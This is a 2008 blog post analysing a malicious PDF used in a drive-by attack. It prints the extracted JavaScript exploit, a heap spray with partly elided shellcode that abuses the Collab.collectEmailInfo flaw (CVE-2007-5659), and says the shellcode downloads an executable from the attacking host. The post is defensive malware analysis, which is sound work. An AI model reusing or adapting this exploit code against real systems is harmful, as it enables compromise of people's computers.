marco
blog
Menu:
Malicious PDFs
November 13, 2008
Lately, malicious PDFs are becoming more popular. They generally abuse the JavaScript functionality that Adobe added to the PDF specification. Luckily, it is not too difficult to analyze these files, since, as we will see, they use pretty much the same techniques that are used in malicious JavaScript code. I'll use as an example the us.pdf file, which was used in a drive-by exploit attack hosted on 78.157.142.122.
PDFs are generally compressed, so the first step is to uncompress the file. To do this, I generally use the nice pdftk tool:
pdftk us.pdf output us.clear.pdf uncompress
Now, if you open us.clear.pdf, the JavaScript code is nicely readable inside one of the objects defined by the document:
function re(count,what)
var v = "";
while (--count >= 0) v += what;
return v;
}
function start() {
var sc = unescape(
"%u9090%u9090%u9090%u9090%ueb90%u5e1a%u5b56%u068a" +
"%u303c%u1674%ue0c0%u4604%u268a%ue480%u020f%u88c4" +
"%u4303%ueb46%ue8e9%uffe1%uffff%u585e%u5c51%u5050" +
...
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%u9090%u9090%u9090");
if (app.viewerVersion >= 7.0) {
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) +
unescape("%u0b0b%u0028%u0aeb%u0aeb") +
unescape("%u9090%u9090") +
re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) +
sc +
re(1256,unescape("%u4141%u4141"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) +
sc +
re(80,unescape("%u9090%u9090"))+
unescape("%ue7e9%ufff9")+
unescape("%uffff%uffff") +
unescape("%uf6eb%uf4eb") +
unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
var shaft = app.setTimeOut("start()",2000);
The code exploits a vulnerability in the collectEmailInfo method of
the Collab object
(CVE-2007-5659).
The shellcode used in the attack downloads an executable file from the
same site. Anubis has some interesting details
on the behavior of this
executable.
Another interesting thing to note is that PDF files can contain quite a few features and behaviors that may surprise and catch off-guard the attackers. Make sure to read Didier Stevens' post on how he used the incremental updates feature to reconstruct how the malicious file was created.
To leave a comment, complete the form below. Mandatory fields are marked *.
I think I received one of these! I am investigating!
Wow.. I never thought that PDFs can be malicious. Is there any document, file or whatever that can be untouchable?